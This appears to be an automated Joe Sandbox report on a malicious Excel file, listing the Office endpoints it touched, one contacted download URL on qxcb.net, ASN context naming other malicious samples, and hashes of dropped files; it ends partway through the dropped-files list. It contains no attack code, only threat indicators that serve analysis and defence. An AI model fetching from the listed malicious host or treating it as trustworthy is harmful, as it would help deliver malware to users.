https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://rpsticket.partnerservices.getmicrosoftkey.com0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://cortana.ai0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://api.aadrm.com/0%URL Reputationsafe
https://ofcrecsvcapi-int.azurewebsites.net/0%Avira URL Cloudsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://res.getmicrosoftkey.com/api/redemptionevents0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
https://powerlift-frontdesk.acompli.net0%URL Reputationsafe
http://qxcb.net/ds/161120.gif0%Avira URL Cloudsafe
https://officeci.azurewebsites.net/api/0%Avira URL Cloudsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://store.office.cn/addinstemplate0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://wus2-000.pagecontentsync.0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://store.officeppe.com/addinstemplate0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://dev0-api.acompli.net/autodetect0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://www.odwebp.svc.ms0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://dataservice.o365filtering.com/0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://officesetup.getmicrosoftkey.com0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://prod-global-autodetect.acompli.net/autodetect0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://apis.live.net/v5.0/0%URL Reputationsafe
https://asgsmsproxyapi.azurewebsites.net/0%Avira URL Cloudsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://ncus-000.contentsync.0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFile0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://skyapi.live.net/Activity/0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://dataservice.o365filtering.com0%URL Reputationsafe
https://ovisualuiapp.azurewebsites.net/pbiagave/0%Avira URL Cloudsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe
https://directory.services.0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
qxcb.net
198.57.244.39
truefalse
    unknown

    Contacted URLs

    NameMaliciousAntivirus DetectionReputation
    http://qxcb.net/ds/161120.giffalse
    • Avira URL Cloud: safe
    unknown

    URLs from Memory and Binaries

    NameSourceMaliciousAntivirus DetectionReputation
    https://api.diagnosticssdf.office.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
      high
      https://login.microsoftonline.com/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
        high
        https://shell.suite.office.com:1443E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
          high
          https://login.windows.net/72f988bf-86f1-41af-91ab-2d7cd011db47/oauth2/authorizeE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
            high
            https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=FlickrE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
              high
              https://cdn.entity.E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              https://api.addins.omex.office.net/appinfo/queryE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                high
                https://wus2-000.contentsync.E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                • URL Reputation: safe
                • URL Reputation: safe
                • URL Reputation: safe
                unknown
                https://clients.config.office.net/user/v1.0/tenantassociationkeyE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                  high
                  https://dev.virtualearth.net/REST/V1/GeospatialEndpoint/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                    high
                    https://powerlift.acompli.netE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://rpsticket.partnerservices.getmicrosoftkey.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                    • URL Reputation: safe
                    • URL Reputation: safe
                    • URL Reputation: safe
                    unknown
                    https://lookup.onenote.com/lookup/geolocation/v1E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                      high
                      https://cortana.aiE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                      • URL Reputation: safe
                      • URL Reputation: safe
                      • URL Reputation: safe
                      unknown
                      https://apc.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                        high
                        https://cloudfiles.onenote.com/upload.aspxE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                          high
                          https://syncservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                            high
                            https://entitlement.diagnosticssdf.office.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                              high
                              https://na01.oscs.protection.outlook.com/api/SafeLinksApi/GetPolicyE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                high
                                https://api.aadrm.com/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                unknown
                                https://ofcrecsvcapi-int.azurewebsites.net/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                • Avira URL Cloud: safe
                                unknown
                                https://dataservice.protection.outlook.com/PsorWebService/v1/ClientSyncFile/MipPoliciesE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                  high
                                  https://api.microsoftstream.com/api/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                    high
                                    https://insertmedia.bing.office.net/images/hosted?host=office&adlt=strict&hostType=ImmersiveE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                      high
                                      https://cr.office.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                        high
                                        https://portal.office.com/account/?ref=ClientMeControlE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                          high
                                          https://ecs.office.com/config/v2/OfficeE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                            high
                                            https://graph.ppe.windows.netE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                              high
                                              https://res.getmicrosoftkey.com/api/redemptioneventsE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://powerlift-frontdesk.acompli.netE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              • URL Reputation: safe
                                              unknown
                                              https://tasks.office.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                high
                                                https://officeci.azurewebsites.net/api/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                • Avira URL Cloud: safe
                                                unknown
                                                https://sr.outlook.office.net/ws/speech/recognize/assistant/workE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                  high
                                                  https://store.office.cn/addinstemplateE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://wus2-000.pagecontentsync.E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  • URL Reputation: safe
                                                  unknown
                                                  https://outlook.office.com/autosuggest/api/v1/init?cvid=E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                    high
                                                    https://globaldisco.crm.dynamics.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                      high
                                                      https://nam.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                        high
                                                        https://store.officeppe.com/addinstemplateE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://dev0-api.acompli.net/autodetectE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://www.odwebp.svc.msE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        • URL Reputation: safe
                                                        unknown
                                                        https://api.powerbi.com/v1.0/myorg/groupsE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                          high
                                                          https://web.microsoftstream.com/video/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                            high
                                                            https://graph.windows.netE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                              high
                                                              https://dataservice.o365filtering.com/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://officesetup.getmicrosoftkey.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              • URL Reputation: safe
                                                              unknown
                                                              https://analysis.windows.net/powerbi/apiE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                high
                                                                https://prod-global-autodetect.acompli.net/autodetectE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://outlook.office365.com/autodiscover/autodiscover.jsonE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                  high
                                                                  https://powerpoint.uservoice.com/forums/288952-powerpoint-for-ipad-iphone-iosE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                    high
                                                                    https://eur.learningtools.onenote.com/learningtoolsapi/v2.0/getfreeformspeechE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                      high
                                                                      https://pf.directory.live.com/profile/mine/System.ShortCircuitProfile.jsonE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                        high
                                                                        https://onedrive.live.com/about/download/?windows10SyncClientInstalled=falseE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                          high
                                                                          https://webdir.online.lync.com/autodiscover/autodiscoverservice.svc/root/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                            high
                                                                            http://weather.service.msn.com/data.aspxE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                              high
                                                                              https://apis.live.net/v5.0/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              unknown
                                                                              https://officemobile.uservoice.com/forums/929800-office-app-ios-and-ipad-asksE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                high
                                                                                https://word.uservoice.com/forums/304948-word-for-ipad-iphone-iosE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                  high
                                                                                  https://autodiscover-s.outlook.com/autodiscover/autodiscover.xmlE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                    high
                                                                                    https://management.azure.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                      high
                                                                                      https://outlook.office365.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                        high
                                                                                        https://incidents.diagnostics.office.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                          high
                                                                                          https://clients.config.office.net/user/v1.0/iosE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                            high
                                                                                            https://insertmedia.bing.office.net/odc/insertmediaE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                              high
                                                                                              https://o365auditrealtimeingestion.manage.office.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                high
                                                                                                https://outlook.office365.com/api/v1.0/me/ActivitiesE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                  high
                                                                                                  https://api.office.netE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                    high
                                                                                                    https://incidents.diagnosticssdf.office.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                      high
                                                                                                      https://asgsmsproxyapi.azurewebsites.net/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                      • Avira URL Cloud: safe
                                                                                                      unknown
                                                                                                      https://clients.config.office.net/user/v1.0/android/policiesE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                        high
                                                                                                        https://entitlement.diagnostics.office.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                          high
                                                                                                          https://pf.directory.live.com/profile/mine/WLX.Profiles.IC.jsonE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                            high
                                                                                                            https://autodiscover-s.outlook.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                              high
                                                                                                              https://storage.live.com/clientlogs/uploadlocationE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                high
                                                                                                                https://templatelogging.office.com/client/logE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                  high
                                                                                                                  https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=OneDriveE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                    high
                                                                                                                    https://management.azure.com/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                      high
                                                                                                                      https://ncus-000.contentsync.E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      • URL Reputation: safe
                                                                                                                      unknown
                                                                                                                      https://login.windows.net/common/oauth2/authorizeE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                        high
                                                                                                                        https://dataservice.o365filtering.com/PolicySync/PolicySync.svc/SyncFileE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        • URL Reputation: safe
                                                                                                                        unknown
                                                                                                                        https://graph.windows.net/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                          high
                                                                                                                          https://api.powerbi.com/beta/myorg/importsE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                            high
                                                                                                                            https://devnull.onenote.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                              high
                                                                                                                              https://r4.res.office365.com/footprintconfig/v1.7/scripts/fpconfig.jsonE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                high
                                                                                                                                https://messaging.office.com/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                  high
                                                                                                                                  https://dataservice.protection.outlook.com/PolicySync/PolicySync.svc/SyncFileE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                    high
                                                                                                                                    https://augloop.office.com/v2E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                      high
                                                                                                                                      https://insertmedia.bing.office.net/images/officeonlinecontent/browse?cp=BingE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                        high
                                                                                                                                        https://skyapi.live.net/Activity/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        • URL Reputation: safe
                                                                                                                                        unknown
                                                                                                                                        https://clients.config.office.net/user/v1.0/macE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                          high
                                                                                                                                          https://dataservice.o365filtering.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          • URL Reputation: safe
                                                                                                                                          unknown
                                                                                                                                          https://onedrive.live.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                            high
                                                                                                                                            https://ovisualuiapp.azurewebsites.net/pbiagave/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                            • Avira URL Cloud: safe
                                                                                                                                            unknown
                                                                                                                                            https://visio.uservoice.com/forums/368202-visio-on-devicesE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                              high
                                                                                                                                              https://directory.services.E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              • URL Reputation: safe
                                                                                                                                              unknown
                                                                                                                                              https://login.windows-ppe.net/common/oauth2/authorizeE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                                high
                                                                                                                                                https://loki.delve.office.com/api/v1/configuration/officewin32/E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                                  high
                                                                                                                                                  https://onedrive.live.com/embed?E686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                                    high
                                                                                                                                                    https://augloop.office.comE686101D-62B1-4FED-AC7A-87B20396F87E.0.drfalse
                                                                                                                                                      high

                                                                                                                                                      Contacted IPs

                                                                                                                                                      • No. of IPs < 25%
                                                                                                                                                      • 25% < No. of IPs < 50%
                                                                                                                                                      • 50% < No. of IPs < 75%
                                                                                                                                                      • 75% < No. of IPs

                                                                                                                                                      Public

                                                                                                                                                      IPDomainCountryFlagASNASN NameMalicious
                                                                                                                                                      198.57.244.39
                                                                                                                                                      unknownUnited States
                                                                                                                                                      46606UNIFIEDLAYER-AS-1USfalse

                                                                                                                                                      General Information

                                                                                                                                                      Joe Sandbox Version:31.0.0 Red Diamond
                                                                                                                                                      Analysis ID:320378
                                                                                                                                                      Start date:19.11.2020
                                                                                                                                                      Start time:10:00:28
                                                                                                                                                      Joe Sandbox Product:CloudBasic
                                                                                                                                                      Overall analysis duration:0h 5m 2s
                                                                                                                                                      Hypervisor based Inspection enabled:false
                                                                                                                                                      Report type:light
                                                                                                                                                      Sample file name:Document3327.xlsb
                                                                                                                                                      Cookbook file name:defaultwindowsofficecookbook.jbs
                                                                                                                                                      Analysis system description:Windows 10 64 bit v1803 with Office Professional Plus 2016, Chrome 85, IE 11, Adobe Reader DC 19, Java 8 Update 211
                                                                                                                                                      Number of analysed new started processes analysed:14
                                                                                                                                                      Number of new started drivers analysed:0
                                                                                                                                                      Number of existing processes analysed:0
                                                                                                                                                      Number of existing drivers analysed:0
                                                                                                                                                      Number of injected processes analysed:0
                                                                                                                                                      Technologies:
                                                                                                                                                      • HCA enabled
                                                                                                                                                      • EGA enabled
                                                                                                                                                      • HDC enabled
                                                                                                                                                      • AMSI enabled
                                                                                                                                                      Analysis Mode:default
                                                                                                                                                      Analysis stop reason:Timeout
                                                                                                                                                      Detection:MAL
                                                                                                                                                      Classification:mal72.expl.evad.winXLSB@1/6@1/1
                                                                                                                                                      Cookbook Comments:
                                                                                                                                                      • Adjust boot time
                                                                                                                                                      • Enable AMSI
                                                                                                                                                      • Found application associated with file extension: .xlsb
                                                                                                                                                      • Found Word or Excel or PowerPoint or XPS Viewer
                                                                                                                                                      • Attach to Office via COM
                                                                                                                                                      • Scroll down
                                                                                                                                                      • Close Viewer
                                                                                                                                                      Warnings:
                                                                                                                                                      Show All
                                                                                                                                                      • Exclude process from analysis (whitelisted): BackgroundTransferHost.exe, backgroundTaskHost.exe, svchost.exe, wuapihost.exe
                                                                                                                                                      • Excluded IPs from analysis (whitelisted): 104.43.193.48, 168.61.161.212, 52.109.76.6, 52.109.12.21, 52.109.12.22, 13.88.21.125, 51.104.139.180, 52.155.217.156, 8.248.99.254, 8.248.115.254, 8.253.145.105, 8.238.85.126, 8.250.159.254, 20.54.26.129, 23.10.249.43, 23.10.249.26
                                                                                                                                                      • Excluded domains from analysis (whitelisted): prod-w.nexus.live.com.akadns.net, arc.msn.com.nsatc.net, a1449.dscg2.akamai.net, arc.msn.com, db5eap.displaycatalog.md.mp.microsoft.com.akadns.net, audownload.windowsupdate.nsatc.net, nexus.officeapps.live.com, officeclient.microsoft.com, displaycatalog.mp.microsoft.com, watson.telemetry.microsoft.com, auto.au.download.windowsupdate.com.c.footprint.net, img-prod-cms-rt-microsoft-com.akamaized.net, au-bg-shim.trafficmanager.net, displaycatalog-europeeap.md.mp.microsoft.com.akadns.net, prod.configsvc1.live.com.akadns.net, db3p-ris-pf-prod-atm.trafficmanager.net, displaycatalog.md.mp.microsoft.com.akadns.net, ris-prod.trafficmanager.net, skypedataprdcolcus17.cloudapp.net, ctldl.windowsupdate.com, skypedataprdcolcus15.cloudapp.net, ris.api.iris.microsoft.com, umwatsonrouting.trafficmanager.net, config.officeapps.live.com, skypedataprdcolwus15.cloudapp.net, europe.configsvc1.live.com.akadns.net
                                                                                                                                                      • VT rate limit hit for: /opt/package/joesandbox/database/analysis/320378/sample/Document3327.xlsb

                                                                                                                                                      Simulations

                                                                                                                                                      Behavior and APIs

                                                                                                                                                      No simulations

                                                                                                                                                      Joe Sandbox View / Context

                                                                                                                                                      IPs

                                                                                                                                                      No context

                                                                                                                                                      Domains

                                                                                                                                                      No context

                                                                                                                                                      ASN

                                                                                                                                                      MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                                                                                                                                                      UNIFIEDLAYER-AS-1USPOSH XANADU Order-SP-20093000-xlxs.xlsxGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.144.204
                                                                                                                                                      dVcML4Zl0J.dllGet hashmaliciousBrowse
                                                                                                                                                      • 192.232.229.53
                                                                                                                                                      JTWtIx6ADf.dllGet hashmaliciousBrowse
                                                                                                                                                      • 192.232.229.53
                                                                                                                                                      yrV5qWOmi3.dllGet hashmaliciousBrowse
                                                                                                                                                      • 192.232.229.53
                                                                                                                                                      bGtm3bQKUj.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.41.224
                                                                                                                                                      http://sanwhyl.seclenght.ml/whelst/8728WKEE_773_JDG833.htmlGet hashmaliciousBrowse
                                                                                                                                                      • 162.214.72.58
                                                                                                                                                      https://app.box.com/s/frm9cufh9ljwjmsdcrv6gioilzlttstrGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.41.34
                                                                                                                                                      https://pornshare.cyou/mnbvcgh/loiuhgf/Get hashmaliciousBrowse
                                                                                                                                                      • 162.241.143.221
                                                                                                                                                      Invoice_99012_476904.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 192.232.229.53
                                                                                                                                                      Invoice_37081_761967.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.44.26
                                                                                                                                                      https://juicytatesful.com/re/Get hashmaliciousBrowse
                                                                                                                                                      • 162.241.126.121
                                                                                                                                                      https://damartex-my.sharepoint.com/:o:/g/personal/gvernon_damart_com/EiJSECE48EZEjXDMHc8NQJgBxBqgSsD-ZFrLB4gCHeMTJA?e=FDTAvaGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.127.155
                                                                                                                                                      https://rb.gy/pt1wisGet hashmaliciousBrowse
                                                                                                                                                      • 192.254.234.249
                                                                                                                                                      https://finnhammars-my.sharepoint.com/:o:/g/personal/erica_roempke_finnhammars_se/Ej-Z4o-5sm9DnKA3qpnhRyYBtAZylN4t5DisuS7MSGCA_g?e=BQY0iuGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.116.106
                                                                                                                                                      https://finnhammars-my.sharepoint.com/:o:/g/personal/erica_roempke_finnhammars_se/Ej-Z4o-5sm9DnKA3qpnhRyYBtAZylN4t5DisuS7MSGCA_g?e=BQY0iuGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.116.106
                                                                                                                                                      BL, Invoices.exeGet hashmaliciousBrowse
                                                                                                                                                      • 162.241.230.107
                                                                                                                                                      JmuEmJ4T4r5bc8S.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.5.77
                                                                                                                                                      Invoice_043866_370540.xlsmGet hashmaliciousBrowse
                                                                                                                                                      • 192.232.229.53
                                                                                                                                                      PO.no.12.exeGet hashmaliciousBrowse
                                                                                                                                                      • 192.185.165.195
                                                                                                                                                      b6egewgab.dllGet hashmaliciousBrowse
                                                                                                                                                      • 192.232.229.53

                                                                                                                                                      JA3 Fingerprints

                                                                                                                                                      No context

                                                                                                                                                      Dropped Files

                                                                                                                                                      No context

                                                                                                                                                      Created / dropped Files

                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\WebServiceCache\AllUsers\officeclient.microsoft.com\E686101D-62B1-4FED-AC7A-87B20396F87E
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:XML 1.0 document, UTF-8 Unicode text, with very long lines, with CRLF line terminators
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):129952
                                                                                                                                                      Entropy (8bit):5.378325518375296
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:1536:rcQceNWiA3gZwLpQ9DQW+zAUH34ZldpKWXboOilXPErLL8TT:5mQ9DQW+zBX8u
                                                                                                                                                      MD5:FDB05E6A1E540C0F52991EA94CDD3887
                                                                                                                                                      SHA1:A8EC332272EB0B65DA75112CE0FBDCAC40D6AC1A
                                                                                                                                                      SHA-256:1F3EC35561B57EA36B5A1877B78EB8EB8E06394CA846F35A8626CFE3F2D73293
                                                                                                                                                      SHA-512:761E6002AEAE44DB4CC60084FFE3787354ADC14004F8182B9C0456E9F4C783C60D7942A0B3CE519F0DB972B142AD41CFCE131EC78AC93974F838C8CC8188BF17
                                                                                                                                                      Malicious:false
                                                                                                                                                      Reputation:low
                                                                                                                                                      Preview: <?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2020-11-19T09:01:32">.. Build: 16.0.13517.30525-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://rr.office.microsoft.com/research/query.asmx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientHome">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. </o:service>.. <o:service o:name="ClViewClientTemplate">.. <o:url>https://ocsa.office.microsoft.com/client/15/help/template</o:url>.. </o:service>.. <o:
                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\Content.MSO\5CA7355C.png
                                                                                                                                                      Process:C:\Program Files (x86)\Microsoft Office\Office16\EXCEL.EXE
                                                                                                                                                      File Type:PNG image data, 10 x 12, 8-bit/color RGBA, non-interlaced
                                                                                                                                                      Category:dropped
                                                                                                                                                      Size (bytes):232
                                                                                                                                                      Entropy (8bit):6.39540254875446
                                                                                                                                                      Encrypted:false
                                                                                                                                                      SSDEEP:6:6v/lhPZ3fMR/e9xDGNteR7+l2RX+dS6fO3rDg9QqXjp:6v/7h30/osreRsS6e9KN
                                                                                                                                                      MD5:AD2EB1D2F28E315B5F7559FBE68FD44E
                                                                                                                                                      SHA1:71CAD9DCE565AC8E6155888E7FD6196F9AA6D9E3
                                                                                                                                                      SHA-256:3EB3CD078172ED3D3BC6A4734924E1A39F85D651E03326BD811CDE42D72D2848
